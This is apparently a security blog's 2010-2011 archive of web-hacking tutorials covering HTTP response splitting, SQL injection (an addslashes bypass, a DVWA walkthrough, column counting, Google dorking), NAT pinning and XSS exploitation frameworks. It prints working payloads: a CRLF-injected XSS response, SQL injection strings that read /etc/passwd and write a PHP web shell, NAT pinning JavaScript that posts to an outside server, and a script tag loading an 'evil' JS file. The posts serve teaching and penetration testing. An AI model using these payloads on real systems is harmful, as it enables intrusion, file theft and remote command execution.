Category Archives: Web Hacking

HTTP Response Splitting

1
Posted by Skyler on March 30, 2011 – 1:20 am
Filed under Fu (a.k.a Tips), Research, Web Hacking

HTTP Response Splitting

The glory days of remote code execution exploitation are gone. Client side injection attacks have become today’s standard for attackers. The idea behind a client side injection attack is that the attacker is able to break out of an applications context to allow the execution of user provided data. The most familiar attacks of this class are: Cross-Site Scripting (XSS), Cross Site Request Forgery (CSRF), and SQL Injection. However, the theory of injection goes far beyond the inclusion of javascript or SQL in dynamic content. One of those less noticed attacks includes the HTTP Response Splitting attack (HRS). Although this attack was discovered in 2002, the security community still remains mostly aloof to its existence and exact mechanics [1]. Unfortunately this lack of knowledge leaves many to assume that such an attack is mostly harmless when compared to other attacks; in reality it is quite the opposite [4].

 

Overview

 

Normal HTTP traffic uses a one-to-one queue for request-response communication. The request agent will remember sending a single request and will expect a single response in return. Any additional responses are still added to the queue and remain there until the client is expecting a response. Because a queue is being used the first response in priority may not actually be the response associated with the most recent request [2]. An HRS attack exploits this functionality.

The attack involves three parties. The first of these parties is a vulnerable web server. The second party is the target; usually a web proxy or caching system. The third and final party is the attacker himself. When the appropriate environment exists, the attacker is able to alter a single request to appear and be processed by the web server as two requests. The web server in turn responds to each request. As those two responses return to the target, the cache/proxy will forward on the first response but will store the second one. As the agent submits another request the proxy will send the next response in the queue, which happens to be the response associated with the injected request. This can lead to a variety of attack vectors that will be discussed later.

 

How It Is Done

The vulnerability exists where user provided input is stored within the request’s HTTP headers. Lets use a simple redirect page as an example:

 

<?php header (“Location: “ .  $_GET[‘page’]); ?>

 

This script will take whatever value is passed for the value of ‘page’ and use it within an HTTP header to redirect to a new page [4]. If I were to provide the value of ‘www.foobar.com’, the associated HTTP response would look as such:

 

HTTP/1.1 302 Found

Date: Wed, 16 Mar 2011 19:49:28 GMT

Server: Apache/2.2.17 (Unix) mod_ssl/2.8.27 OpenSSL/0.9.8o

Location: http://www.foobar.com

Keep-Alive: timeout=15, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: text/html

 

In such a situation the user’s browser would process this response and forward the user to the value of ‘Location:’. However, because the value of ‘page’ is not being scrubbed prior to being inserted into our HTTP header, it presents an opportunity for injection.

In order to manipulate the HTTP request we must understand the HTTP Protocol and its rules on the formatting of HTTP headers. The rule that relates to HRS is the specification of Carriage Return-Line Feeds (CRLF, or (\r\n). The use of CRLF in injection attacks has been around for some time [3]. It has been used to exploit many protocols and applications in order to bypass restrictions and manipulate data. In regards to HTTP, the protocol defines that each header will be separated with a single CRLF(\r\n), while the content  will be separated from the headers by two CRLF(\r\n\r\n). Following these rules an attacker can inject a completely new request into the vulnerable header. Here is an example of an injection string, as it would look as a request to our redirect script:

 

http://www.vulnerablesite.com/redirect.php?page=nonsense%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<script>alert(/XSS/.source)</script>

 

Here we see that a normal looking request has been constructed using encoded values of the CRLF characters. The body of the response contains a XSS attack that is not limited as many other XSS attacks are. As the user submits their next request, the injected XSS response will be returned and executed in their browser [1].

 

Damage Potential

Cross-Site Scripting: This attack is what was demonstrated in our above examples. Essentially, the injected response could include any javascript code the attacker desires.[4]

 

Cross-User Defacement: This attack causes a defacement/spoofing type of condition on one specific user. This attack could be used in conjunction with other attack vectors to steal cookies and session data as well as other information about the user.[4]

Web Cache Poisoning: This attack is similar to Cross-User Defacement but instead it targets an entire group of users. It does this by poisoning the cache of a proxy that multiple systems communicate with and through. This causes the before mentioned exploited condition to be applied to multiple targets.[4]

Page Hijacking: The attacker can use this method to intercept the web server’s response to a users request. That request may contain important and private information that would now be sent to the attacker. [4]

Browser Cache Poisoning: This attack causes persistence of the defacement condition by forcing the browser to cache the targeted page.[4]

Mitigations

 

The primary mitigations against the HRS attack is two-fold. First, scrub user input of all CR & LF characters. Only insert them if you intend for them to be there. Secondly, check for encoded values and either escape them or sanitize them [4].

 

Conclusion

I hope that this has opened the eyes of the reader to better understanding injection theory, the vast scope of attacks that exist, and the importance of secure coding practices. I encourage the reader to go and do further research on the topics discussed here.

[1] Divide and Conquer

This is the article written by the discoverer of the HTTP Response Splitting attack. Readers should use this is an in depth reference to HRS in the real world. The author not only explains the attack and demonstrates its use, but also discusses evasion techniques that allow attackers to perform HRS upon targets with protection. The reader should grasp the full and indepth understanding of the danger and applications of the HRS attack in the real world.

[2] HTTP Response Splitting

This article gives a clear and concise breakdown of the HTTP Response Splitting attack. The theory and methodology of the attack is explained in a clear manner as well as explinations and examples. This article should serve as a means to allow the reader to grasp the overall idea behind HRS.

[3] Bugtraq: CRLF Injection

This article discusses the possibilities of the CRLF problem that make the HTTP Response Splitting attack possible. Not only does the author explain HRS, but he shows how abusing unfiltered input could allow him to create false log entries and other forms of manipulation. The reader should be able to understand the theory behind HRS and recognize other possibilities related to unfiltered CR-LF in all types of systems.

[4] Introdution to HTTP Response Splitting

This article talks more specifically about the different attack vectors that HTTP Response Splitting presents. The author gives exact examples to demonstrate each payload/vector in a clear manner. The reader should be able to conceptualize how the formation of an HRS attack would look like and therefore how to prevent it.

[5] OWASP: HTTP Response Splitting

This article is the official refernece for HTTP Response Splitting provided by the Open Web Application Security Project. This article is aimed towards the application developer. The information here gives a simple example of what a vulnerable target would look like and how a programmer would therefore be able to spot and mitigate the attack. After reading, the reader should be able to recognize a vulnerable target by looking at its request headers.

 

OWASP Top 10 Tools and Tactics

0
Posted by Skyler on March 21, 2011 – 9:24 pm
Filed under Fu (a.k.a Tips), Tools, Web Hacking

This is a great article, I wont risk doing it injustice. Just check it out:

Top 10 Tools and Tactics

Lots of the tools are found here: Samurai-WTF Firefox Add-ons

[Tool] String Encoder

0
Posted by Skyler on February 22, 2011 – 8:14 am
Filed under Fu (a.k.a Tips), Tools, Web Hacking

I have to thank Joe McCray for this one.

String Encoder is a useful tool when doing XSS and SQLI attacks that require filter bypass. The input to the tool takes whatever your string is, and then encodes it according to your desires and outputs it in an injectable format. Here are the current options:

(c) 2008 Grayscale Research – Web Injection Conversion Utility
Mysql Usage:
./convert -mx ConvertStrToMySQL_0x
./convert -mc ConvertStrToMySQL_CHAR()
MSQL Usage:
./convert -sc ConvertStrToMSQL_CHAR()
C encoding:
./convert -c  ConvertStrToCEscape
Web Attack Usage:
./convert -x  ConvertStrToXSS
./convert -u8 ConvertStrToUTF8
Intel ASM Encode:
./convert -as ConvertStrToASM
./convert -ia ConvertStrToInlineASM
Here is a sample run:
$ ./convert -u8 "' or 1 like 1-- "
Encoded for UTF-8: ——-
Original: ‘ or 1 like 1–
Encoded: %27%20%6f%72%20%31%20%6c%69%6b%65%20%31%2d%2d%20
You can download StringEncoder here!

SQL Injection: bypassing addslashes()

6
Posted by Skyler on February 15, 2011 – 11:12 pm
Filed under Fu (a.k.a Tips), Web Hacking

This is really simple. Many will try to nullify SQL injection using the php addslahes() function. However, this is easily bypassed using an invalid multi-byte character. Let me illustrate how this works:

Entering the hex value: 0xbf27 (invalid)

MySQL will mutate it into something valid: 0xbf5c27

when looking at this mutated result in ascii, it looks like: ¿\’

The issue exists at the hex level. the 0xbf5c is read as a single character, leaving the 0×27 by itself. That means that although there is a preceding slash, it is not registering it as such, and leaves the inverted comma unescaped, and successfully injected past addslahes().

Read more in detail here:

Hackipedia – SQL Injection

ZeroIdentity: “addslashes() exploited?”

My Favorite SQL Injection Cheat Sheets

0
Posted by Skyler on February 11, 2011 – 8:55 pm
Filed under Web Hacking

For those that were at my presentation yesterday: Here is the blog post of my favorite SQL Injection cheat sheets. Enjoy!

JustinShattuck’s SQL Injection Cheat Sheet

Pentest Monkey’s MySQL Injection Cheat Sheet

Ferrah Mavituna’s SQL Injection Cheat Sheet

Reiners SQLI Bypass Presentation

SQL Injection Walkthrough

0
Posted by Skyler on February 11, 2011 – 7:33 am
Filed under Web Hacking

Yesterday I did and intro to SQL Injection presentation for the university Linux Society. Here is the “Cheat Sheet” for the exercises, and here is the SQLIPresentation in pdf form (lost some of the interactive functionality in transferring to pdf format). The target was DVWA:

1) Handle single quotes?

-  O’Connor

2) What is the comment?

- ‘ # O’Connor

- ‘ — O’Connor

3) How many rows returned by original query?

- ‘ order by 1#  etc

4) Name of rows

- ‘ and firstname is null#

5) name of table

- ‘ or test.user is NULL#

6) Columns in table

- ‘ union all select 1, (select count(*) from users)#

7) Get Passwords

- ‘ union all select user, password from users#

EXTRAA)

Get the Version:

‘ union select all 1, @@version#

Get /etc/passwd:

‘ union all select load_file(0x2f6574632f706173737764), 1#

Write file to server:

‘ union all select load_file(0x2f6574632f706173737764), 1 into outfile “/opt/lampp/htdocs/hackable/uploads/passwd.html”#

Command Execution:

‘ union all select ‘<?php system($_GET[\'cmd\']); ?>’, null into outfile “/opt/lampp/htdocs/hackable/uploads/shell.php”#

Using Google To Locate SQL Injection

2
Posted by Skyler on January 12, 2011 – 6:00 am
Filed under Basics, Fu (a.k.a Tips), Web Hacking

SQL Injection is a powerful attack that exists today. It is found in web applications that interact with databases.

What Is SQL Injection?

The attack itself involves breaking out of the context of a developer defined SQL query and inserting your own logic in place. It is a result of inproper validation of user input, and programmer neglect of secure programming practices. If SQL Injection is completely new to you, I would recommend the following reading:

Discovery

There are a plethora of tools available to help you with SQL Injection. I will spare you the endless lists of tools, and show you the underlying techniques. First of all, let us discover some possible attack points. One of my favorite tools for this is Google! A query like the following can be used to find targets:

site:targetOfPentest.com inurl:"id=1"

In this example, we tell google to only search our target site (site:<testing target>), and for URLs that contain the string “id=1″ (inurl:”<search string literal>”). A note, Google excludes certain symbols like = and ? unless relevent. That is why i add the 1. It can really be anything you want. The reason this query works is simple. In many cases parameters for a specific request will contain actual ids reflecting the database. For instance, an id parameter may be used in a request to fetch its matching id from the server. Now, there is an underlying principle here that I had drilled into me by an Oracle ACE: NEVER reveal a primary key to the user. But back to the point, you see here that you can search for request parameters with names that may reflect their usage in the database. Here is a list I like:

  • userid=
  • index=
  • form=
  • username=

As another general rule, I look for parameters where the values are numbers, however in some cases strings are valuable.

There are also other types of google searches that are valuable. These take a little bit more searching testing, but they can give some great hits:

... inurl:login.(asp|php)[...]

In this case I am looking for certain pages that have specific functionality. I used the | seperated notation to indicate that I am looking for login.asp, and login.php pages. If you notice, the elipses (…)is in square brackets. This has to do with the request type. For example, in a GET request will include its parameters and values within the URL, whereas a POST request will hide the parameters in the message. So, if you include some extra logic, you will find examples of specific functioning pages which use GET requests. An example of this would be:

inurl:"login.(asp|php) inurl:"id=1"

For some reason, Google will pick up “login.asp?id=1″ (meaning, it will include the ? ). You can discovere different result sets byutilizing a closing double-quote on the first inurl statement, or removing them altogether. Play around with it.

What about POST requests?

Well, there are a few ways I like to deal with POST requests. Both are pretty simple. The manual way I use to see if the parameters are even semi-injectable is quite straight forward. Do the following:

  1. Open firebug, or use another debugger (Chrome’s Inspector, etc).
  2. Locate the form you want to test
  3. Literally change “POST”, to “GET”
  4. Submit the form with dummy data

Now look at the URL. It will have the parameters of the request included there. Now, when your actually testing for SQL injection, you dont want to rely on the replaying of this URL over and over. Instead you should use some sort of inline/local proxy. My favorite (because its easy) is TamperData, a firefox extension.

I think that is probably enough about simple discovery of SQL Injection targets with Google. I am sure there are more and better searches out there, please feel free to comment with your own favorites.

Stay tuned for more posts on SQL injection.

NAT Pinning

0
Posted by Skyler on January 11, 2011 – 8:56 am
Filed under Fu (a.k.a Tips), Web Hacking

Here is a method that was voted one of the top 15 web attacks for 2011. It is called NAT Pinning. The idea of this attack is this:

Lets say you have a victim who has very useful ports like 21(FTP), or 22 (SSH), or even 80(HTTP, intranet?) open. The problem is that the host is located behind a firewall/router that blocks these to the outside. NAT Pinning is a way to utilize port forwarding of the routing device to allow you access to these ports. All of this without XSS or CSRF! Very nice. Here is the process as explained by the author:

1. Attacker lures victim to a URL by convincing them that there are pictures of cute kittens on the page.
2. Victim clicks on URL and opens the page.
3. The page has a hidden form connecting to http://attacker.com:6667 (IRC port).
4. The client (victim) submits the form without knowing. An HTTP connection is created to the (fake) IRC server.
5. The fake IRC server, run by the attacker, simply listens, unlike me according to former girlfriends.
6. The form also has a hidden value that sends: “PRIVMSG samy :\1DCC CHAT samy [ip in decimal] [port]\1\n”
7. Your router, doing you a favor, sees an “IRC connection” (even though your client is speaking in HTTP) and an attempt at a “DCC chat”. DCC chats require opening a local port on the client for the remote chatter to connect back to you.
8. Since the router is blocking all inbound connections, it decides to forward any traffic to the port in the “DCC chat” back to you to allow NAT traversal for the friendly attacker to connect back and “chat” with you. However, the attacker specified the port to be, for example, port 21 (FTP). The router port forwards 21 back to the victim’s internal system. The attacker now has a clear route to connect to the victim on port 21 and launch an attack, downloading the victim’s highly classified cute kitten pictures.

Here is the JavaScript extracted from his Proof-of-concept page:

<script>
function getNetInfo() {
var sock = new java.net.Socket();
sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
return sock.getLocalAddress().getHostAddress();
}
function natpin(port)
{
ip = 1193351435;
server = 'samy.pl';
x = String.fromCharCode(1);
s = 'PRIVMSG samy :'+x+'DCC CHAT samy '+ip+' '+port+x+"\n";
acidburn = document.getElementById("acidburn");
gibson = document.createElement("form");
gibson.setAttribute("name", "B");
gibson.setAttribute("target", "A");
gibson.setAttribute("method", "post");
gibson.setAttribute("action", "http://"+server+":6667");
gibson.setAttribute("enctype", "multipart/form-data");
crashoverride = document.createElement("textarea");
crashoverride.setAttribute("name", "C");
crashoverride.setAttribute("value", s);
crashoverride.innerText=s;
crashoverride.innerHTML=s;
gibson.appendChild(crashoverride);
acidburn.appendChild(gibson);
setTimeout('l('+port+')', 500);
// this will never complete
gibson.submit();
}
</script>

Find the Proof-of-Concept and Full Explanation here!

SQL Injection: Determining the number of columns

0
Posted by Skyler on January 7, 2011 – 7:10 am
Filed under Basics, Fu (a.k.a Tips), Web Hacking

When you are performing error based SQL Injection it is important to be able to determine the number of columns in the table. There are generally two different ways you can go about this:

1) Order By:

http://www.vulnerablesite.me/lookup.php?id=1 ORDER BY n--

In this case, where n is any number greater than 0, we can determine the number of columns by trying different values. I usually increment the number by 2 until I get an error. I then decrease the number by one and try it again. If it returns no error, then that is the number of columns.

Once again, lets say that the following example (n = 7) yielded an error:


http://www.vulnerablesite.me/lookup.php?id=1 ORDER BY 7--

In this case, if the previous test (where n=6) did NOT yield an error, then I would be able to deduce that the number of columns is 6.

Note: the — is a comment. This is used to comment out any other clauses that might cause an error in the injected SQL (WHERE, original ORDER BY, etc).

2) UNION ALL
This method is a little more work, and is used for exploitation anyway. So its really your preference.

Lets say the target is the same as the last. So we know that the number of columns is 6. The following would NOT yield an error:

http://www.vulnerablesite.me/lookup.php?id=1 UNION ALL SELECT null,null,null,null,null,null [from dual] --

In this method, an error will be thrown if unioning any number of columns (or nulls) other than the correct number.

The from dual portion is necessary if attacking an Oracle database.

XSS – Exploitation beyond alert(‘xss’)

0
Posted by Skyler on December 14, 2010 – 10:43 am
Filed under Basics, Fu (a.k.a Tips), Tools, Web Hacking

Cross-Site Scripting (as I had just recently discussed in a previous post) is a fairly simple attack to find and prove. However, actually making it do something useful is often elusive. The common vector is usually something like stealing cookies; session ids, etc.

In a penetration test, you would find it difficult to display criticality of a threat using a simple alert() box containing some text. Fortunately, there are a few tools out there that can help us demonstrate the danger of XSS. Most of these tools will cause exploitation via an injection similar to this:

<img src=”badurl.com/eviljs.js” />

  1. Browser Exploitation Framework (BEeF) – This amazing tool is my favorite stop for exploiting XSS beyond alert boxes. Essentially, when the victims browser executes the js file, it hooks into a php page that then allows a variety of attacks to be made. The attacker will see the attacked machine appear as a “zombie” and can do as they wish. The basics are included, as well as some metasploit interaction (i.e, Java Applet attack). From here it is simple to push a shell through, and achieve persistent exploitation of the target.
  2. Shell of the Future – This is another great tool for session hijacking via XSS. It works by using the HTML5 Cross Origin Request capability. When a user executes the payload, it then creates a connection to SotF’s web server (hosted on your machine). On the attacker end, SotF sets up a proxy that connects in with the server. So essentially, the attackers connection to your web server acts as a proxy for your browser. The attacker then browses to the SotF console, selects the victim, and can then browse using the victims session.
  3. Jikto – This tools received a lot of media attention when it was released. It was considered questionable about how any legitimate use of this tool was feasible . It works like this: When the victim executes the JS, it hooks them into botnet. From there the client can search, port scan, and exploits discovered XSS victims. The last I looked most of the source code was hidden away (or the mirrors were taken down).
  4. Others – there are others out there XSS Shell, etc. I wont go into details on those because they have simliar capabilities of those I listen above. If you have some of your favorites, please post a comment for others to look into.

I hope this was a little helpful.

Bad Behavior has blocked 275 access attempts in the last 7 days.